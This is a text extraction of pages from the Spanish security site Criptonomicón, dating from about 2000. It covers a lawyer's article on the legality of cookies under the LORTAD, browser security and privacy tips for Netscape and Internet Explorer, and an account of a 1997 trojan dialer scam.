visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos22.html (7 of 7) [25/10/2000 02:31:10 p.m.]

Es legal el uso de cookies?

Comercio electrnico

Criptologa y seguridad

Es legal el uso de cookies?

Cuestiones legales

Por Fernando Ramos Surez

Intimidad y privacidad

Las Cookies son ficheros de datos guardados en un directorio especfico del

Virus

ordenador del usuario. Se crean por los sevidores web con el objeto de ser
envados a los programas navegadores del usuario, y as recoger la
informacin que dicho fichero ha reunido.
La informacin que es revelada a la web visitada, puede ser utilizada por los
administradores de sistemas para construir perfles personales de las
personas que les visitan. Colocando una cookie en el navegador de un
visitante, automticamente el servidor registra informacin en la cookie. Esto
permite que los administradores puedan ver por ejemplo el histrico de sitios
que el usuario ha visitado antes de entrar en la web, as como los anuncios
que ha visto, nmero de transacciones realizadas en la web etc. En
resumen, son una funcin valiosa en la web, ya que a raz de la informacin
obtenida pueden realizar estudios minuciosos de los hbitos del consumidor,
preferencias en la web, tiempo dedicado etc. Para muchas empresas
constituye la principal herramienta de marketing empresarial en la Web.
Por tanto nos encontramos con un poderoso instrumento de obtencin de
informacin para el administrador de un servidor y para los departamentos
de marketing de las empesas que tienen una pgina web en Internet. Esta
forma de producir informacin puede extralimitar los derechos de privacidad
que los internautas poseen y por tanto infringir los preceptos legales de la
Ley Orgnica Reguladora del Tratamiento Auomatizado de los Datos de
Carcter personal (L.O.R.T.A.D.). Segn la LORTAD datos personales son
aquellos que contengan cualquier informacin concerniente a personas
fsicas identificadas o identificables. Por tanto desde el momento en que la
cookie cumpla estos requisitos existir una lesin al derecho a la intimidad.
Un caso evidente de lesin a la intimidad sera en el caso de las direcciones
IP fijas. Un uso manifiesto de la direccin IP puede llegar a revelar la
identidad de esa persona . No ocurrira lo mismo con las direcciones IP
dinmicas ya que no todos los usuarios de dichas direcciones utilizan la
misma direccin IP.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos21.html (1 of 3) [25/10/2000 02:31:10 p.m.]

Es legal el uso de cookies?

Un caso parecido sera la personalizacin de los navegadores o de los


sistemas operativos con los nombres y apellidos de los usuarios, (por
ejemplo Windows 95), las cookies pueden recopilar estos nombres y
aadirlos al fichero cookie para identificar la informacin con una
determinada persona fsica lo que producira una clara transgresin del
derecho a la intimidad, ya que se han obtenido una serie de datos
personales sin el consentimiento del afectado. Pero a esto se podra rebatir
diciendo que el usuario acepta la cookie y por tanto da su consentimiento.
Sin embargo esto no es as ya que, a parte de que tienes que configurar
personalmente el Navegador para que te avise de la recepcin de
cookies(ya que por defecto el Navegador no te avisa), el consentimiento
prestado para la admisin de una cookie ni mucho menos supone una
renuncia a los derechos salvaguardados por la LORTAD, ya que en la cookie
no se ha hecho mencin y por tanto no se ha advertido de la posible
utilizacin automatizada de los datos recabados por la misma. Luego todo
dato conseguido sin el consentimiento del titular es licito desde el momento
en que los datos son identificables con su persona. Este punto es realmente
importante, es decir, es necesario que los datos almacenados por la cookie
sean identificadores o identificables de una determinada persona fsica. El
motivo es evidente puesto que la LORTAD no protege a los datos sino a las
personas y a su derecho a la privacidad o la intimidad. En su art 1 dice
literalmente: La presente ley Orgnica, en desarrollo de lo previsto en el
apartado 4 del art. 18 de la Constitucin, tiene por objeto limitar el uso de la
informtica y otras tcnicas y medios de tratamiento automatizado de los
datos de caracter personal para garantizar el honor, la intimidad personal y
familiar de las personas fsicas y el pleno ejercicio de sus derechos. En
definitiva de lo que se trata es de establecer una serie de derechos y
obligaciones para garantizar el derecho a la intimidad. Entre dichos derechos
destacan:
art. 5 el derecho a ser informado en la recogida de los datos:
1) Los afectados a los que se soliciten datos personales dern ser
previamente informados de modo expreso, preciso e inequivoco: a) De la
existencia de un fichero automatizado de datos de caracter personal, de la
finalidad de la recogida de stos y de los destinatarios de la informacin. b)
Del carcter obligatorio o facultativo de su respuesta a las preguntas que le
sean planteadas. c) De las consecuencias de la obtencin de los datos o de
la negativa a suministrarlos. d) De la posibilidad de ejercitar los derechos de
acceso, rectificacin y cancelacin. e) De la identidad y direccin del
responsable del fichero.
En resumen, desde el momento en que los datos que aporta la cookie son
identificables o identificados con una determinada persona que no ha
prestado su consentimiento para un posterior tratamiento automatizado,
poedrn ser considerados como datos obtenidos ilegalmente siendo objeto
de sancin por la Agencia de Proteccin de Datos.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos21.html (2 of 3) [25/10/2000 02:31:10 p.m.]

Es legal el uso de cookies?

Publicado en el Boletn del Criptonomicn #21.


Fernando Ramos Surez es abogado especializado en Derecho Informtico, del
Departamento de Asesora Jurdica de ITEM (Informacin Tecnologa y Marketing
Consultores).

Informacin adicional

Todo sobre las cookies

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos21.html (3 of 3) [25/10/2000 02:31:10 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/simetrico.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/simetrico.gif [25/10/2000 02:31:12 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/asimetrico.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/asimetrico.gif [25/10/2000 02:31:12 p.m.]

Cmo proteger el correo en Windows

Consejos para
administradores
Consejos para
usuarios

Cmo proteger el correo en Windows


A muchos usuarios de Windows les surge la duda de cmo hacer para proteger el
correo propio, de manera que no pueda ser examinado por terceros.
Pedro Prez Rodrguez, nos proporciona sus consejos:
Para Outlook, y en lo que se refiere al correo almacenado, lo que tendras que hacer
es poner un password al nivel de tu carpeta personal de correo (la del fichero .pst).
Para ello tienes que ir a servicios y en la carpeta personal que quieras proteger pulsar
propiedades y ponerle una nueva password. Cuando te la pida recuerda no tener
marcada la opcin de 'Recordar la Clave', si la pulsas estaras como al principio,
puesto que no te la volver a pedir.
Si a lo que te refieres es a que no se descarge tu nuevo correo y que te pida la
password de tu servidor pop3 (como con un cliente NetScape), lo que debes hacer es
no poner password en el recuadro dedicado para ello en el servicio de internet mail.
Cuando te descargue nuevo correo te pedir la password. No marques la opcin de
recordar la password puesto que otra vez perders la nica forma de seguridad que
tiene.
Si estas utilizando de servidor de correo uno Exchange, el usuario lo tomar por
defecto con el que el servidor tenga configurada la cuenta, tpicamente el usuario de
la red NT donde estes, con lo que la validacin del usuario la tienes en el login de
red.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/correo.html [25/10/2000 02:31:13 p.m.]

Cmo desactivar JavaScript en Internet Explorer

Consejos para
administradores
Consejos para
usuarios

Cmo desactivar JavaScript en Internet


Explorer
Muchos usuarios se han vuelto locos intentando desactivar JavaScript en Internet
Explorer, sin llegar a encontrar por ningn sitio cmo hacerlo. La opcin se oculta en
el siguiente lugar:
Ver --> Opciones de Internet... --> Seguridad --> Configuracin... -->
Automatizacin --> Automatizacin activa
La gran mayora de agujeros de seguridad que se han descubierto en Internet
Explorer estn directamente relacionados con la forma de implantarse Java y
JavaScript en el navegador. Si, por precaucin, se selecciona la opcin Pedir datos,
cada vez que se accede a una pgina que albergue cdigo de JavaScript aparecer una
ventana con la pregunta Desea permitir la ejecucin de los archivos de comandos?,
que puede terminar resultando molesta si todas las pginas web de un sitio utilizan
JavaScript. Dependiendo del riesgo que se desee correr, se puede activar o desactivar
JavaScript al gusto.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/javascript.html [25/10/2000 02:31:13 p.m.]

Cmo s si tengo Java activado?

Consejos para
administradores
Consejos para
usuarios

Cmo s si tengo Java activado?


Cualquier usuario de Netscape o Internet Explorer es un usuario de Java, tanto si lo
sabe como si no, ya que la configuracin por defecto de los navegadores es el activar
Java. Pero si despus de leer mis pginas sobre la seguridad en Java te sientes
amenazado y deseas desactivarlo, aqu te explico cmo hacerlo:

Usuarios de Netscape 4.x


En el caso de Netscape es bastante sencillo:
Edicin --> Preferencias --> Avanzadas --> Activar Java
Por defecto esa casilla estar chequeada. Para desactivar Java, simplemente haz click
en ella.

Usuarios de Internet Explorer 5


En este caso es un poco ms complicado, pero tambin se puede hacer:
Herramientas --> Opciones de Internet --> Seguridad --> Internet --> Personalizar
nivel... --> Java --> Permisos de Java --> Desactivar Java
Elige esta opcin si deseas desactivar Java.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/java.html [25/10/2000 02:31:14 p.m.]

Cuidado con los plug-ins

Consejos para
administradores
Consejos para
usuarios

Cuidado con los plug-ins


En Netscape Communicator, en el men de Edicin, Preferencias..., Navigator,
Aplicaciones, se puede especificar qu aplicaciones de ayuda y plug-ins se lanzarn
en respuesta a la carga de ficheros con una extensin determinada y un tipo MIME
asociado que el navegador no puede visualizar directamente.
As, por ejemplo, si al navegar por una pgina web encuentra un enlace a un
documento Word, cuya extensin es .doc, al seguir el enlace se arrancar Microsoft
Word, si as aparece configurado en la ventana de aplicaciones. Esta caracterstica
permite que el navegador sea capaz de visualizar directamente documentos en PDF,
archivos de sonido o de vdeo, etc.
Tanto las aplicaciones de ayuda como los plug-ins son programas en cdigo nativo
con acceso total a los recursos del sistema, por lo que conviene instalarlos con
precaucin, ya que si alguno estuviera escrito con malas intenciones podra causar
daos irreparables. De hecho, se han producido ataques gracias a plug-ins maliciosos
(lea la escalofriante historia de las Estafas telefnicas a travs de la pornografa en
Internet).
Otros plug-ins, sin estar especficamente diseados para perjudicar al navegante,
contenan agujeros de seguridad que permitan obtener informacin de su sistema,
como ocurri en 1997 con el plug-in de ShockWave de Macromedia, que permita a
un servidor web obtener ficheros del disco duro del visitante.
Por otro lado, una pgina maliciosa podra tambin utilizar documentos que
contuvieran virus de macro, como ha ocurrido en Word y Excel, para hacer que el
usuario incauto los ejecutara en su ordenador.
Como medida cautelar, se debe instalar el menor nmero posible de plug-ins y
aplicaciones de ayuda y siempre de casas conocidas en las que se puede confiar. Para
los tipos de archivo que se consideren potencialmente portadores de virus o con
capacidad de interpretar comandos, se debe especificar que el navegador pida
confirmacin antes de abrirlos. Para ello, se selecciona el tipo de documento, por
ejemplo "Microsoft Excel Worksheet" y se aprieta el botn de Editar... en la
ventana que aparece. En la nueva ventana se selecciona la opcin de avisar antes de
abrir documentos de este tipo. Puede comprobar qu plug-ins tiene instalados
escribiendo en la ventana de direccin:
about:plugins

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/plugins.html (1 of 2) [25/10/2000 02:31:14 p.m.]

Cuidado con los plug-ins

Es muy probable que se sorprenda de la cantidad de plug-ins que posee, sin ser
consciente de ello. Quin los puso ah? Usted, cuando instal otros programas, que a
lo mejor en algn momento de la instalacin le interrogaron acerca de su deseo de
aadir un programa para su integracin con el navegador.
Si te preocipa tu seguridad al navegar por Internet, puedes consultar la gua ms
completa sobre navegacin segura en Internet.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/plugins.html (2 of 2) [25/10/2000 02:31:14 p.m.]

Estafas telefnicas a travs de la pornografa en Internet

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Estafas telefnicas a travs de la


pornografa en Internet
En enero de 1997 se produjo un timo en Internet que lleg a
provocar facturas telefnicas de cientos de miles de pesetas a
vctimas ingenuas en Canad que descargaron pornografa del
sitio Web sexygirls.com.

Preferencias
Informacin de
seguridad

Netwatch
EL sitio Web informaba a los usuarios desprevenidos, vidos de
sexo, que las fotos que ofrecan eran totalmente gratis. Ahora bien, para ver las
fotografas era necesario descargar un visor de imgenes especial. Como los
navegantes ya estn acostumbrados a instalar plug-ins y aplicaciones de ayuda, no le
prestaban mayor importancia y lo instalaban inocentemente en su ordenador. Lo que
no podan imaginar es que en realidad se trataba de un caballo de Troya. Al ejecutar
este visor especial, silenciaba el altavoz del mdem del usuario, a continuacin lo
desconectaba del proveedor de acceso a Internet que estuviera utilizando y se
conectaba sigilosamente a un nmero de telfono en Moldavia, en la antigua Unin
Sovitica. De Moldavia, la llamada se rediriga a un ordenador en Scarborough, en
Norteamrica, donde se encontraban almacenadas las fotos pornogrficas que se
presentaban al usuario. De manera subrepticia, el ordenador del navegante en Canad
estaba accediendo a un servidor en Scarborough a travs de una llamada de larga
distancia a Moldavia. Lo que es ms, aunque el usuario se cansase de ver pornografa
y saltase a otros sitios Web abandonando sexygirls.com, continuaba hacindolo
conectado con Moldavia que funcionaba ahora como proveedor de servicio, con los
pasos corriendo a ritmo frentico.

Este suceso ilustra los peligros de instalar plug-ins y software indiscriminadamente,


sin prestar atencin a lo que se hace. En este caso, la negligencia lleg a costar
facturas telefnicas incluso cercanas al milln de pesetas a los navegantes incautos.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/estafas.html (1 of 2) [25/10/2000 02:31:15 p.m.]

Estafas telefnicas a travs de la pornografa en Internet


privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/estafas.html (2 of 2) [25/10/2000 02:31:15 p.m.]

Obtener un navegador vlido

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Obtener un navegador seguro

Netscape Communicator
Intenet Explorer

Puede parecer trivial a primera vista, pero si se reflexiona un poco


Existe solucin?
se comprender la necesidad de obtener una copia vlida y segura
del navegador preferido. No hay que olvidar que el navegador goza de acceso
ilimitado a los recursos del sistema informtico: memoria, disco, conexiones de red,
tarjeta de sonido, impresora, vdeo, etc. En otras palabras, si el navegador decidiera
comportarse maliciosamente, podra llegar a perpetrar cualquier fechora en el
ordenador, desde abrir conexiones con mquinas remotas y filtrar informacin del
disco duro hasta infectarlo con otros virus o destruir ficheros valiosos.
Por lo tanto, cualquier programa con un potencial daino semejante no debera nunca
considerarse a la ligera.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/valido.html [25/10/2000 02:31:15 p.m.]

Configuracin segura de Netscape Communicator

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Configuracin segura de Netscape


Communicator
Una vez que se ha instalado una versin fiable del navegador,
conviene dedicar algunos minutos a su configuracin en vez de
lanzarse a navegar directamente con las opciones por defecto con
las que arranca el programa recin instalado.

Preferencias
Informacin de
seguridad

Netwatch
El hecho de que exista en Netscape Communicator un men con
el nombre Informacin sobre seguridad puede confundir a los usuarios al inducirles a
creer que basta con entender y configurar correctamente lo que aparece en dichos
mens para garantizar la navegacin segura. Como se ver a continuacin, existen
otras muchas opciones repartidas por diferentes mens que no deben dejarse al azar.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/netscape.html [25/10/2000 02:31:15 p.m.]

Configuracin segura de Internet Explorer

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Configuracin segura de Internet


Explorer
A continuacin, se examinarn las opciones que deben
configurarse para aumentar la seguridad en la navegacin con
Internet Explorer. Se dejarn de lado otras caractersticas que no
afecten directa o indirectamente a la seguridad e intimidad en la
navegacin.
En este navegador, estas opciones se encuentran agrupadas en el
men Ver, bajo el comando Opciones de Internet....
Nos iremos refiriendo a cada una de las seis pestaas que contiene
la ventana desplegada, describiendo aquellas opciones relevantes
para la navegacin segura.

General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/microsoft.html [25/10/2000 02:31:16 p.m.]

Configuracin segura de Internet Explorer - Pestaa General

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Pestaa General
En Archivos temporales de Internet se puede
configurar el tamao de cache de disco y su localizacin, pulsando
el botn de Configuracin. Se aplican los mismos
comentarios y consejos que se vieron para Netscape.
En Historial se puede configurar el nmero de das que
Internet Explorer mantiene las pginas visitadas. Se aplican los
mismos comentarios y consejos que se vieron para Netscape.

General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pgeneral.html [25/10/2000 02:31:16 p.m.]

Configuracin segura de Internet Explorer - Pestaa Seguridad

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Pestaa Seguridad
Desde la versin 4.x de Internet Explorer, la seguridad al navegar
se fundamenta en las zonas de seguridad, que constituyen un
medio de reducir la complejidad de la seguridad del sistema al
asignar polticas de seguridad a grupos enteros de sitios.

General
Seguridad
Contenido

Microsoft Internet Explorer 4.x divide el mundo de Internet en


Conexin
cuatro categoras o zonas, a cada una de las cuales se le puede
asignar individualmente su propia configuracin. De ah en
Programas
adelante, cada sitio web sera asignado a su zona correspondiente
Opciones avanzadas
con el nivel de seguridad adecuado. El nombre de la zona de
Internet en la que se est navegando aparece en la barra de estado
en la parte inferior derecha. De esta forma, cada vez que intente abrir un sitio o
descargar contenido de la web, Internet Explorer comprobar la configuracin de
seguridad. A la sazn, Internet Explorer suministra cuatro zonas de seguridad, como
se muestra en la tabla Zonas de seguridad de Internet Explorer. Adems, se supone
que los archivos de su equipo local son completamente seguros, por lo que no se les
aplica la configuracin de seguridad. Esta caracterstica le permite abrir y ejecutar
archivos y programas de su equipo sin preguntas ni interrupciones.
Para agregar sitios web a una zona de seguridad, en la lista Zona, seleccione Zona
de sitios de confianza o Zona de sitios restringidos. Pulse en
Agregar sitios y escriba la direccin URL del web y pulse en Agregar.
Por su parte, a cada zona se le puede asignar su propio nivel de seguridad. Estos
niveles de seguridad se aplicarn a todo cdigo descargado desde sitios de la zona en
particular. En la tabla Niveles de seguridad para las zonas se listan los distintos
niveles de seguridad.
En la Figura se muestra cmo se puede acceder al cuadro de configuracin de las
zonas de seguridad en Internet Explorer. En el men desplegable Zona se puede
elegir la zona que se desea configurar, con el nivel de seguridad Alto (el ms
seguro), Medio (seguro), Bajo (No recomendado normalmente) o
Personalizar (slo para usuarios expertos).
file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pseguridad.html (1 of 3) [25/10/2000 02:31:16 p.m.]

Configuracin segura de Internet Explorer - Pestaa Seguridad

Si se elige Personalizar, se activar el botn Configuracin..., que una


vez pulsado abre la ventana ms crptica de todas cuantas presenta Internet Explorer.
Desgraciadamente, la recomendacin entre parntesis (slo para usuarios expertos)
puede disuadir a muchos navegantes que no se consideran tales de configurar
personalizadamente la seguridad. Si, a pesar de todo, decide entrar en la ventana de
configuracin, se encontrar con una jerga difcil, que puede terminar por
confundirle. Se intentar arrojar luz sobre estas opciones, con el fin de que ningn
usuario de Internet Explorer renuncie a la configuracin personalizada de su
seguridad por no entender las opciones que se le presentan.
Controles y complementos para ActiveX: especifica cmo
reaccionar el navegador ante controles ActiveX. En el contexto de Internet,
un control ActiveX es un objeto ejecutable que se inserta dentro de una pgina
web. Este control se comporta como cualquier otro programa convencional
que tenga instalado en su ordenador, sin ningn tipo de restricciones a lo que
puede hacer. Por su elevadsimo riesgo, se recomienda que en todos los casos
se seleccione la opcin de Pedir datos para que se solicite su aprobacin antes
de emprender acciones relacionadas con los controles ActiveX. Si no desea
arriesgarse, desactive todos y si al navegar por Internet se encuentra con uno,
le aparecer una ventana informndole de que no lo puede ejecutar porque su
configuracin de seguridad lo impide. Sopese cuidadosamente si el sitio que lo
enva es de fiar y si de verdad le merece la pena ejecutarlo, y en caso
afirmativo, cambie la configuracin activando los permisos. Recuerde que si lo
ejecuta, le abre de par en par las puertas de su ordenador, permitindole hacer
lo que quiera.
Autenticacin del usuario: especifica cmo desea administrar las
solicitudes de servidores que necesitan informacin de inicio de sesin. Los
servidores de redes internas (intranets), y en algunos casos sitios web de
Internet, requieren frecuentemente un nombre de usuario y una contrasea para
limitar el acceso nicamente a los usuarios autorizados. Se recomienda que
seleccione Preguntar por el nombre de usuario y la
contrasea para conectar a un servidor y proporcionar un
nombre y una contrasea cuando lo solicite.
Descargas: dado que al descargar archivos siempre se le pedir
confirmacin, puede activar la descarga de archivos sin problemas. Eso s,
cuando le aparezca el cuadro preguntndole qu desea hacer con el archivo
descargado, nunca responda que desea abrirlo directamente. En su lugar,
guarde el archivo o programa en disco y bralo o ejectelo despus de tomar
precauciones como las siguientes:
1. Comprobar el archivo con un detector de virus.
2. Guardar su trabajo y cerrar los dems programas.
3. Desconectarse de Internet u otra conexin de red. Para mayor seguridad,
asegrese de que la casilla de verificacin Preguntar siempre antes de
abrir este tipo de archivo est activada.
Java: especifica el nivel de seguridad con que permitir que se ejecuten las
file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pseguridad.html (2 of 3) [25/10/2000 02:31:16 p.m.]

Configuracin segura de Internet Explorer - Pestaa Seguridad

applets de Java sin pedirle antes confirmacin de los permisos necesarios.


Normalmente, las applets de Java carecen de acceso a archivos, carpetas y
conexiones de red del equipo, puesto que se ejecutan en un recinto de
seguridad sin ningn privilegio. Ahora bien, si una applet de Java requiere un
acceso mayor del que se ha especificado, se le pedir que otorgue ms
permisos a la applet. Se pueden especificar configuraciones individuales para
cada tipo de acceso que puede requerir una applet, seleccionando la opcin
Personalizada y pulsando a continuacin en el botn Configuracin
de Java personal... que aparecer. Sin embargo, esta configuracin
requiere conocimientos sofisticados de Java, por lo que se recomienda la
opcin ms conservadora de seleccionar Seguridad alta. Tambin se le
ofrece la oportunidad de desactivar Java si as lo desea, lo cual slo se
recomienda en el caso de utilizar para navegar un ordenador con datos
altamente sensibles.
Miscelneo: aqu se configuran una serie de rasgos diversos, como el nivel
de seguridad que desea asignar a los canales de distribucin de software de esa
zona, que se recomienda sea Seguridad alta para permitir nicamente la
notificacin, pero no permitir la descarga e instalacin automticas. En todos
los dems casos se recomienda la opcin de Pedir datos para que se le
pida aprobacin antes de continuar.
Automatizacin: muchos usuarios se han vuelto locos intentando
desactivar JavaScript en Internet Explorer, sin llegar a encontrar por ningn
sitio cmo hacerlo. Aqu se oculta la opcin, en Automatizacin
activa. Al igual que ha ocurrido con Netscape Communicator, la gran
mayora de agujeros de seguridad que se han descubierto en Internet Explorer
estn directamente relacionados con la forma de implantarse estos lenguajes en
el navegador. Si, por precaucin, selecciona la opcin Pedir datos, cada vez
que acceda a una pgina que albergue cdigo de JavaScript se le presentar
una ventana con la pregunta Desea permitir la ejecucin de
los archivos de comandos?, que puede terminar resultando molesta
si todas las pginas web de un sitio utilizan JavaScript. Dependiendo del riesgo
que desee correr, puede activarlo o desactivarlo a su gusto.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pseguridad.html (3 of 3) [25/10/2000 02:31:16 p.m.]

Configuracin segura de Internet Explorer - Pestaa Contenido

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Pestaa Contenido
General
En Restricciones, al igual que NetWatch en Netscape,
Internet Explorer incorpora un Asesor de contenidos para ayudarle
Seguridad
a controlar el tipo de contenidos de Internet a los que tiene acceso
su equipo. Una vez activado el Asesor de contenido, slo podrn
Contenido
mostrarse los contenidos restringidos que satisfagan o excedan los
criterios que determine. Con el fin de evitar que otros usuarios
Conexin
vean o cambien su configuracin, sta se protege mediante una
Programas
contrasea. A partir del momento en que se activa el Asesor de
contenido, nadie que use su navegador podr saltarse las
restricciones. El inconveniente de utilizar el Asesor es que si no se Opciones avanzadas
activa la casilla Los usuarios pueden ver sitios no restringidos
(en la pestaa General dentro de Asesor de contenido), al ser tan pocas las
pginas actualmente clasificadas, la navegacin se volvera prcticamente imposible.
Esto empuja normalmente a activar dicha casilla, con lo cual se podr navegar por la
casi totalidad de sitios Internet, especialmente con contenidos violentos o sexuales,
los cuales con toda seguridad no incluirn una clasificacin. Este obstculo vuelve
este sistema inservible en la prctica.

En Certificados se pueden examinar los certificados actuales. Vea la pgina


sobre qu son los certificados y cmo obtenerlos.
En Informacin personal puede editar su perfil con toda la informacin
acerca de su persona: nombre, domicilio, negocios, direccin de correo electrnico,
certificados, etc. Esta informacin se compartir con pginas web que lo requieran,
manteniendo su intimidad y seguridad. Mediante este mtodo se le evita tener que
escribir repetidamente la misma informacin, como su nombre o direccin de correo
electrnico, cada vez que visite un nuevo sitio web. Al mismo tiempo, no se podr
ver esta informacin en su equipo ni se podr compartir con otros sin su permiso. En
la prctica, son tan pocos los sitios web que la solicitan que no merece la pena que
rellene los datos. Tambin dispone de la opcin de pagos a travs de Internet, que le
permitir trabajar con Microsoft Wallet.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pcontenido.html (1 of 2) [25/10/2000 02:31:17 p.m.]

Configuracin segura de Internet Explorer - Pestaa Contenido

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pcontenido.html (2 of 2) [25/10/2000 02:31:17 p.m.]

Configuracin segura de Internet Explorer - Pestaa Conexin

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Pestaa Conexin
Desde esta pestaa se puede configurar el servidor proxy de
acceso a Internet. Se aplican los mismos comentarios y consejos
que se vieron para Netscape.

General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas

